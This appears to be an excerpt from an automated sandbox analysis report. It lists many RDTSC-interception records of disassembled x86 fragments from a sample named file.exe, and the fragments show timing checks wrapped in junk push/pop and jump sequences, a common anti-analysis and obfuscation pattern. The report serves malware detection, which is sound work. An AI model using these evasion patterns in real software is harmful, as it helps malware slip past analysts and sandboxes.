Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C87A9 second address: 12C8820 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5CB8E4899Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 03BAF798h 0x00000011 mov ecx, eax 0x00000013 call 00007F5CB8E48999h 0x00000018 jnc 00007F5CB8E489A0h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jl 00007F5CB8E48996h 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007F5CB8E4899Eh 0x0000002e mov eax, dword ptr [esp+04h] 0x00000032 push eax 0x00000033 jmp 00007F5CB8E489A8h 0x00000038 pop eax 0x00000039 mov eax, dword ptr [eax] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5CB8E489A4h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C8820 second address: 12C8826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C88D5 second address: 12C88DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C8958 second address: 12C8973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5CB8E4DDA4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C8CA5 second address: 12C8CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5CB8E48996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C8FAB second address: 12C900B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F5CB8E4DD98h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2693h], edi 0x0000002a push 0000001Eh 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F5CB8E4DD98h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C900B second address: 12C9011 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C9011 second address: 12C9017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C9017 second address: 12C901B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C901B second address: 12C901F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C9126 second address: 12C912C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C936C second address: 12C93FD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5CB8E4DD98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov dword ptr [ebp+122D316Dh], esi 0x00000014 mov esi, edx 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp+12489F7Dh] 0x0000001d mov dl, 08h 0x0000001f nop 0x00000020 jmp 00007F5CB8E4DD9Fh 0x00000025 push eax 0x00000026 pushad 0x00000027 jmp 00007F5CB8E4DD9Ah 0x0000002c jbe 00007F5CB8E4DDA9h 0x00000032 popad 0x00000033 nop 0x00000034 lea eax, dword ptr [ebp+12489F39h] 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F5CB8E4DD98h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 jmp 00007F5CB8E4DD9Ah 0x00000059 sub ecx, dword ptr [ebp+122D38A1h] 0x0000005f push eax 0x00000060 pushad 0x00000061 pushad 0x00000062 push ebx 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C93FD second address: 12C940A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5CB8E48996h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1279D39 second address: 1279D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1279D3D second address: 1279D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1279D45 second address: 1279D62 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5CB8E4DD98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5CB8E4DD9Ch 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1279D62 second address: 1279D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1279D66 second address: 1279D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5CB8E4DDA7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FA77D second address: 12FA7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5CB8E48996h 0x0000000a je 00007F5CB8E48996h 0x00000010 popad 0x00000011 jnl 00007F5CB8E48998h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5CB8E4899Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FAA4A second address: 12FAAA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5CB8E4DD96h 0x00000009 jmp 00007F5CB8E4DDA4h 0x0000000e jmp 00007F5CB8E4DDA1h 0x00000013 jmp 00007F5CB8E4DDA6h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jnc 00007F5CB8E4DDA6h 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 jl 00007F5CB8E4DD96h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FAD88 second address: 12FAD9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F5CB8E48996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5CB8E48996h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FAD9C second address: 12FADA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FB051 second address: 12FB104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F5CB8E489A9h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5CB8E489A8h 0x00000014 jmp 00007F5CB8E489A9h 0x00000019 popad 0x0000001a jns 00007F5CB8E489A2h 0x00000020 js 00007F5CB8E4899Ch 0x00000026 jp 00007F5CB8E48996h 0x0000002c popad 0x0000002d pushad 0x0000002e jmp 00007F5CB8E489A9h 0x00000033 jmp 00007F5CB8E4899Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F5CB8E489A1h 0x0000003f jne 00007F5CB8E48996h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1301A01 second address: 1301A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1301A05 second address: 1301A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1300BF3 second address: 1300C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1300E8B second address: 1300EAE instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5CB8E489A2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13006B3 second address: 13006B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13006B9 second address: 13006C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F5CB8E4899Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130121F second address: 1301223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1301223 second address: 1301233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13014A3 second address: 13014A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13014A7 second address: 13014BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jo 00007F5CB8E48996h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13014BB second address: 13014C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13014C0 second address: 13014C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130474B second address: 1304793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F5CB8E4DD96h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F5CB8E4DDA8h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5CB8E4DDA0h 0x00000024 jl 00007F5CB8E4DD96h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1309E67 second address: 1309E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1309E6D second address: 1309E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1309E71 second address: 1309EA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A9h 0x00000007 jmp 00007F5CB8E4899Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130A027 second address: 130A04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F5CB8E4DD9Bh 0x0000000b jmp 00007F5CB8E4DDA5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130A04F second address: 130A054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A362 second address: 130A366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A366 second address: 130A389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F5CB8E489A8h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A389 second address: 130A3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5CB8E4DD96h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F5CB8E4DD9Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A3A7 second address: 130A3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F5CB8E48996h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5CB8E4899Ch 0x00000016 je 00007F5CB8E48996h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A6B5 second address: 130A6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A6BD second address: 130A6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A6C4 second address: 130A6DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5CB8E4DD9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F5CB8E4DD96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A829 second address: 130A838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F5CB8E48996h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A838 second address: 130A865 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 jmp 00007F5CB8E4DDA8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A865 second address: 130A879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5CB8E4899Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A879 second address: 130A87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130AB2C second address: 130AB48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F5CB8E4899Ah 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F5CB8E48996h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130AB48 second address: 130AB4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B02A second address: 130B02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B02E second address: 130B04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5CB8E4DDA1h 0x0000000c jno 00007F5CB8E4DD96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130976B second address: 1309787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5CB8E48996h 0x0000000a jmp 00007F5CB8E4899Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309787 second address: 130978B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130978B second address: 130978F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130978F second address: 13097A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5CB8E4DD9Ah 0x0000000c pop eax 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097A8 second address: 13097AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097AE second address: 13097D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5CB8E4DDA2h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5CB8E4DD9Ah 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097D3 second address: 13097D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D91E second address: 130D922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D616 second address: 130D61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D61A second address: 130D61E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D61E second address: 130D62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13102F6 second address: 1310302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310302 second address: 1310309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131043E second address: 1310450 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5CB8E4DD9Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310450 second address: 1310460 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5CB8E489A2h 0x00000008 ja 00007F5CB8E48996h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312E57 second address: 1312E7B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5CB8E4DDA9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13170F2 second address: 1317101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317101 second address: 1317107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317107 second address: 1317123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5CB8E489A7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131631F second address: 1316323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316323 second address: 131634D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F5CB8E489B4h 0x00000010 jmp 00007F5CB8E489A8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131634D second address: 131636D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5CB8E4DD9Ch 0x0000000a jmp 00007F5CB8E4DD9Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131636D second address: 1316381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5CB8E4899Ah 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316381 second address: 1316390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5CB8E4DD96h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316390 second address: 1316394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13166DD second address: 13166E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131685B second address: 131685F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A963 second address: 131A969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A969 second address: 131A985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007F5CB8E489A2h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320D07 second address: 1320D1C instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E4DD96h 0x00000008 jno 00007F5CB8E4DD96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F615 second address: 131F61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F918 second address: 131F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
